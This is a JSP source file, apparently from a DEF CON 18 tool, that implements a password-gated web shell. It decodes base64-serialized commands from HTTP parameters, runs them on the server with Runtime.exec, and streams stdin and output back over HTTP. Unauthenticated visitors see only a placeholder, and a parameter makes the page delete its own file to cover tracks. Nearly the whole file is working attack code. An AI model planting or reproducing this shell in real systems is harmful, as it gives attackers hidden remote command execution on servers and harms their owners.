<%@ page language="java" session="true" isThreadSafe="true" contentType="text/plain" %>
<%@ page import="java.io.ByteArrayInputStream" %>
<%@ page import="java.io.EOFException" %>
<%@ page import="java.io.File" %>
<%@ page import="java.io.FilterInputStream" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.ObjectInput" %>
<%@ page import="java.io.ObjectInputStream" %>
<%@ page import="java.io.ObjectOutput" %>
<%@ page import="java.io.ObjectOutputStream" %>
<%@ page import="java.io.OutputStream" %>
<%@ page import="java.io.Reader" %>
<%@ page import="java.io.StringReader" %>
<%@ page import="java.io.Writer" %>
<%@ page import="java.util.Arrays" %>
<%@ page import="java.util.WeakHashMap" %>
<%@ page import="sun.misc.BASE64Decoder" %>

@@DEBUG_JSP_START@@ 
<%@ page import="org.slf4j.Logger" %>
<%@ page import="org.slf4j.LoggerFactory" %>
@@DEBUG_JSP_END@@ 

<%!
	@@DEBUG@@ private static final Logger logger = LoggerFactory.getLogger("net.darkmist.defcon18.JSPClient.jsp");
	private static WeakHashMap runners = new WeakHashMap();
	static final byte[] EMPTY_BYTE_ARRAY = new byte[0];
	private static final String PARAM_AUTH = "auth";
	private static final String PARAM_RM = "rm";
	private static final String PARAM_RM_VALUE = "true";

	/**
	 * {@link OutputStream} that base64 encodes data to a
	 * {@link Writer}.
	 */
	private static class Base64WriterOutputStream extends OutputStream
	{
		private static final char[] ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".toCharArray();
		private static final char PAD = '=';
		private Writer writer;
		private byte[] buffer = new byte[3];
		private int buffered = 0;

		private void encode6bits(int val) throws IOException
		{
			writer.write(ALPHABET[val]);
		}

		private void encodeOneByte(int a, int b) throws IOException
		{
			encode6bits((a>>2)&0x3f);
			encode6bits(((a<<4)&0x30) | ((b>>4)&0x0f));
		}

		private void encodeTwoBytes(int a, int b, int c) throws IOException
		{
			encodeOneByte(a, b);
			encode6bits(((b<<2)&0x3c) | ((c>>6)&0x3));
		}

		private void encodeThreeBytes(int a, int b, int c) throws IOException
		{
			encodeTwoBytes(a, b, c);
			encode6bits(c & 0x3f);
		}

		public Base64WriterOutputStream(Writer writer)
		{
			this.writer = writer;
		}

		public void write(int b) throws IOException
		{
			buffer[buffered++] = (byte)b;
			if(buffered>=3)
			{
				encodeThreeBytes(buffer[0],buffer[1],buffer[2]);
				buffered = 0;
			}
		}

		private void flushBuffer() throws IOException
		{
			switch(buffered)
			{
				case 1:
					encodeOneByte(buffer[0],0);
					writer.write(PAD);
					writer.write(PAD);
					break;
				case 2:
					encodeTwoBytes(buffer[0],buffer[1],0);
					writer.write(PAD);
					break;
			}
			buffered = 0;
		}

		public void flush() throws IOException
		{
			flushBuffer();
			writer.flush();
		}

		public void close() throws IOException
		{
			flushBuffer();
			writer.close();
		}
	}

	/**
	 * Decode base64 encoded data. Currently this calls
	 * sun.misc.BASE64Decoder.
	 * @param str The string to decode
	 * @return the decoded byte array.
	 */
	private static byte[] debase64(String str) throws IOException
	{
		return new BASE64Decoder().decodeBuffer(str);
	}

	/**
	 * {@link FilterInputStream} facilitating minimal blocking
	 * operations.
	 */
	public static class MinBlockingInputStream extends FilterInputStream
	{
		public MinBlockingInputStream(InputStream in_arg)
		{
			super(in_arg);
		}
	
		public int read(byte[] b) throws IOException
		{
			return read(b,0,b.length);
		}
	
		public int read(byte[] bytes, int off, int len) throws IOException
		{
			int bytesToRead;
			int bytesRead;
			int b;
	
			if((bytesToRead = this.available())<=0)
			{
				if((b = this.read())<0)	// BLOCKING
					return b;	// eof
				bytes[off] = (byte)b;
				if((bytesToRead = this.available())<=0)
					return 1;
				bytesToRead = Math.min(bytesToRead, len-1);
				if((bytesRead = super.read(bytes, off+1,bytesToRead))<0)
					return 1;	// we got EOF, but we still have one byte
				return bytesRead + 1;
			}
			else
			{
				bytesToRead = Math.min(bytesToRead, len);
				if((bytesRead = super.read(bytes, off, bytesToRead))<0)
					return bytesRead;	// EOF
				return bytesRead;
			}
		}
	
		private final byte[] truncate(byte[] orig, int len)
		{
			byte[] ret;
	
			if(len == 0)
				return EMPTY_BYTE_ARRAY;
			if(len == orig.length)
				return orig;
			ret = new byte[len];
			System.arraycopy(orig, 0, ret, 0, len);
			return ret;
		}
	
		/**
	 	* Reads as many bytes are available without blocking.
	 	* @param off The offset into the array returned where 
	 	*	data should be written. Allows a header to be
	 	*	added later without copying the array around.
	 	* @ret null if nothing could be read. byte array
	 	*	containing empty off bytes followed by the data
	 	*	bytes read.
	 	*/
		public byte[] readAvailable(int off) throws IOException
		{
			int bytesToRead;
			int bytesRead;
			byte[] bytes;
	
			if((bytesToRead = this.available())==0)
				return null;
			bytes = new byte[off + bytesToRead];
			if((bytesRead = this.read(bytes, off, bytesToRead))<0)
				throw new EOFException(); // EOF, go figure
			if(bytesRead == bytesToRead)
				return bytes;
			return truncate(bytes, off+bytesRead);
		}
	
		/**
	 	* Reads as many bytes are available without blocking.
	 	* Calls readAvailable(0).
	 	* @ret null if nothing could be read. byte array
	 	*	containing empty off bytes followed by the data
	 	*	bytes read.
	 	*/
		public byte[] readAvailable() throws IOException
		{
			return readAvailable(0);
		}
	
		/**
	 	* Reads at least one byte blocking if necessary.
	 	* @param off The offset into the array returned where 
	 	*	data should be written. Allows a header to be
	 	*	added later without copying the array around.
	 	* @ret null on EOF. byte array containing empty off bytes
	 	*	followed by the data bytes read.
	 	*/
		public byte[] readBlockAvailable(int off) throws IOException
		{
			int bytesToRead;
			int bytesRead;
			byte[] bytes;
			int b;
	
			// first see if anything is available
			if((bytesToRead = this.available())>0)
			{	// bytes available
				// make sure we aren't trying to allocate 
				// a negative array bounds by wrapping
				bytesToRead = Math.min(bytesToRead, Integer.MAX_VALUE-off);
				bytes = new byte[bytesToRead + off];
	
				// try to read the bytes
				if((bytesRead = super.read(bytes, off, bytesToRead))<0)
					return null;	// EOF
				if(bytesRead == bytesToRead)
					return bytes;	// exact read
				if(bytesRead > 0)
				{	// short read, truncate...
					return truncate(bytes, bytesRead + off);
				}
				// zero read when we had available...
				// fall through to one byte blocking read
			}
	
			// read one byte blocking
			if((b = super.read())<0)	// BLOCKING
				return null;	// eof
	
			// check for more...
			if((bytesToRead = this.available())<=0)
			{	// only got one, return it
				bytes = new byte[off+1];
				bytes[off] = (byte)b;
				return bytes;
			}
	
			// compute length and allocate buffer for bytes
			bytesToRead = Math.min(bytesToRead, Integer.MAX_VALUE-off-1);
			bytes = new byte[off + 1 + bytesToRead];
	
			// read in the rest skipping the offset and the
			// one byte we already read...
			if((bytesRead = super.read(bytes, off+1, bytesToRead))<=0)
			{	// EOF or zero read
				bytes = new byte[off+1];
				bytes[off] = (byte)b;
				return bytes;
			}
			// include that first byte...
			bytes[off] = (byte)b;
			if(bytesRead == bytesToRead)
				return bytes;	// exact read
			// runcate as necessary
			return truncate(bytes, off+1+bytesRead);
		}
	
		/**
	 	* Reads at least one byte blocking if necessary. Calls
	 	* readBlockAvailable(0).
	 	* @ret null on EOF. byte array containing empty off bytes
	 	*	followed by the data bytes read.
	 	*/
		public byte[] readBlockAvailable() throws IOException
		{
			return readBlockAvailable(0);
		}
	}
	
	/**
	 * Running process controller.
	 */
	private static class Runner
	{
		@@DEBUG@@ private static final Logger logger = LoggerFactory.getLogger("net.darkmist.defcon18.JSPClient.jsp.Runner");
		static final String PARAM = "data";
		private static final int STATE_INITIAL	= 0;
		private static final int STATE_RUNNING	= 1;
		private static final int STATE_FLUSHING	= 2;
		private static final int STATE_EXITING	= 3;
		private static final int STATE_ENDED	= 4;

		protected int state = STATE_INITIAL;
		protected Process proc = null;
		protected MinBlockingInputStream stdout = null;
		protected MinBlockingInputStream stderr = null;
		protected OutputStream stdin = null;
		protected Integer exitStatus;

		// lazy lazy lazy, but we have to be synchronized anyway
		protected HttpServletRequest req = null;
		protected HttpServletResponse res = null;
		ObjectInput in;
		ObjectOutput out;

		private static ObjectOutput setupOut(Writer writer) throws Exception
		{
			return new ObjectOutputStream(new Base64WriterOutputStream(writer));
		}

		private  static ObjectInput setupIn(HttpServletRequest req) throws Exception
		{
			String[] params=req.getParameterValues(PARAM);
			String param;
			Reader reader;

			if(params == null)
				throw new IllegalArgumentException("No " + PARAM + " parameter provided");
			if(params.length != 1)
				throw new IllegalArgumentException("Only one " + PARAM + " parameter is supported");
			param = params[0];
			if(param == null)
				throw new IllegalArgumentException("One " + PARAM + " was null");
			return new ObjectInputStream(new ByteArrayInputStream(debase64(param)));
		}

		protected boolean hasExited()
		{
			return (proc == null);
		}

		protected boolean checkHasExited()
		{
			if(proc == null)
				return true;
			try
			{	// throws an exception if it hasn't exited...
				exitStatus = new Integer(proc.exitValue());
				proc = null;
				return true;
			}
			catch(IllegalThreadStateException ignored)
			{
			}
			return false;
		}

		private int handleInitial() throws Exception
		{
			String[] cmd = (String[])in.readObject();
			@@DEBUG@@ logger.debug("handle cmd=" + cmd);
			proc = Runtime.getRuntime().exec(cmd);
			stderr = new MinBlockingInputStream(proc.getErrorStream());
			stdout = new MinBlockingInputStream(proc.getInputStream());
			stdin = proc.getOutputStream();
			stdout = read(stdout, "stdout");
			stderr = read(stderr, "stderr");
			return STATE_RUNNING;
		}

		private void doStdin() throws Exception
		{
			byte[] bytes;
			
			@@DEBUG@@ logger.debug("doStdin");
			if(stdin == null)
			{
				@@DEBUG@@ logger.debug("not looking at input as stdin is closed...");
				return;
			}
			bytes = (byte[])in.readObject();
			@@DEBUG@@ //logger.debug("bytes: " + (bytes == null ? "null" : Arrays.toString(bytes)));
			if(bytes == null)
			{	// EOF
				@@DEBUG@@ logger.debug("bytes=null");
				try
				{
					stdin.close();
				}
				catch(IOException e2)
				{
					@@DEBUG@@ logger.error("IOException closing stdin", e2);
				}
				stdin = null;
				return;
			}
			@@DEBUG@@ logger.debug("bytes.length=" + bytes.length);
			if(bytes.length <= 0)
			{
				@@DEBUG@@ logger.debug("bytes.length <= 0");
				return;
			}
			try
			{
				stdin.write(bytes);
				stdin.flush();
			}
			catch(IOException e)
			{
				@@DEBUG@@ logger.error("IOException writing to stdin", e);
				try
				{
					stdin.close();
				}
				catch(IOException e2)
				{
					@@DEBUG@@ logger.error("IOException closing stdin", e2);
				}
				stdin = null;
			}
		}

		private MinBlockingInputStream read(MinBlockingInputStream in, String id) throws Exception
		{
			byte[] bytes = null;
			boolean isEOF = false;
	
			if(in == null)
			{
				@@DEBUG@@ logger.debug(id + "==null writing byte[0]");
				out.writeObject(EMPTY_BYTE_ARRAY);
				return null;
			}
			try
			{
				if(hasExited())
				{	// min blocking
					bytes = in.readBlockAvailable();
					isEOF = (bytes == null);
				}
				else	// non blocking
					bytes = in.readAvailable();
			}
			catch(EOFException e)
			{
				isEOF = true;
			}
			catch(IOException e)
			{
				@@DEBUG@@ logger.warn("Error reading from " + id, e);
				isEOF = true;
			}
			if(isEOF)
			{
				try
				{
					in.close();
				}
				catch(IOException e)
				{
					@@DEBUG@@ logger.warn("Error closing " + id, e);
				}
				in = null;
			}
			@@DEBUG@@ logger.debug(id + " bytes=" + bytes);
			out.writeObject(bytes == null ? EMPTY_BYTE_ARRAY : bytes);
			return in;
		}

		private int handleRunning() throws Exception
		{
			checkHasExited();
			doStdin();
			stdout = read(stdout, "stdout");
			stderr = read(stderr, "stderr");
			if(hasExited())
				return STATE_FLUSHING;
			return STATE_RUNNING;
		}

		private int handleFlushing() throws Exception
		{
			stdout = read(stdout, "stdout");
			stderr = read(stderr, "stderr");
			if(stderr == null && stdout == null)
				return STATE_EXITING;
			return STATE_FLUSHING;
		}

		private int handleExitStatus() throws Exception
		{
			out.writeObject(exitStatus);
			return STATE_ENDED;
		}

		synchronized boolean handle(HttpServletRequest req_arg, HttpServletResponse res_arg, Writer writer) throws IOException
		{
			@@DEBUG@@ logger.debug("handle logger.debug");
			try
			{
				req = req_arg;
				res = res_arg;
				out = setupOut(writer);
				in = setupIn(req);

				switch(state)
				{
					case STATE_INITIAL:
						state = handleInitial();
						break;
					case STATE_RUNNING:
						state = handleRunning();
						break;
					case STATE_FLUSHING:
						state = handleFlushing();
						break;
					case STATE_EXITING:
						state = handleExitStatus();
						break;
					case STATE_ENDED:
					default:
						break;
				}
			}
			catch(Exception e)
			{
				@@DEBUG@@ logger.error("Exception handling request", e);
				if(out != null)
					out.writeObject(e);
			}
			finally
			{
				req = null;
				res = null;
				in = null;
				if(out != null)
					out.flush();
				out = null;
			}
			return (state == STATE_ENDED);
		}
	}

	/**
	 * Get the runner for the current request's session.
	 * @param req The request to get the runner from.
	 * @returns Runner for the request or null.
	 */
	private synchronized static Runner getRunner(HttpServletRequest req) throws ServletException
	{
		HttpSession session;
		Runner runner;

		session = req.getSession();
		if((runner = (Runner)runners.get(session))!=null)
			return runner;
		runner = new Runner();
		runners.put(session,runner);
		return runner;
	}

	/**
	 * Remove a runner for a request's session.
	 * @param The request to remove it from.
	 */
	private synchronized static void removeRunner(HttpServletRequest req) throws ServletException
	{
		HttpSession session;

		session = req.getSession();
		runners.remove(session);
	}

	/**
	 * Remove this JSP's source file.
	 */
	private void removeSelf(HttpServletRequest request, ServletContext ctx) throws IOException
	{
		String servletPath = request.getServletPath();
		String jspPath = ctx.getRealPath(servletPath);
		if(jspPath != null)
		{
			File jspFile = new File(jspPath);
	
			if(jspFile.exists() && !jspFile.delete())
				jspFile.deleteOnExit();
		}
	}

%>

<%
	// so I haven't done JSP development before... sue me...

	@@DEBUG@@ logger.warn("logging at warn or higher...");
	@@DEBUG@@ logger.info("logging at info or higher...");
	@@DEBUG@@ logger.debug("logging at debug or higher...");
	
	String param;

	if("@@AUTH_KEY_VALUE@@".equals(request.getParameter(PARAM_AUTH)))
	{
		if((param = request.getParameter(Runner.PARAM))!=null && param.length() > 0)
		{
			Runner runner = getRunner(request);
			boolean remove = true;
	
			@@DEBUG@@ logger.debug("got runner... calling handle");
			try
			{
				remove = runner.handle(request, response, out);
			}
			finally
			{
				// remove will be false ONLY if runner returned success. 
				// this way exceptions will remove the runner too.
				if(remove)
					removeRunner(request);
			}
		}
		else if(PARAM_RM_VALUE.equalsIgnoreCase(request.getParameter(PARAM_RM)))
			removeSelf(request,application);
	}
	else
	{
%>
		@@PING_VALUE@@
<%
	}
%>
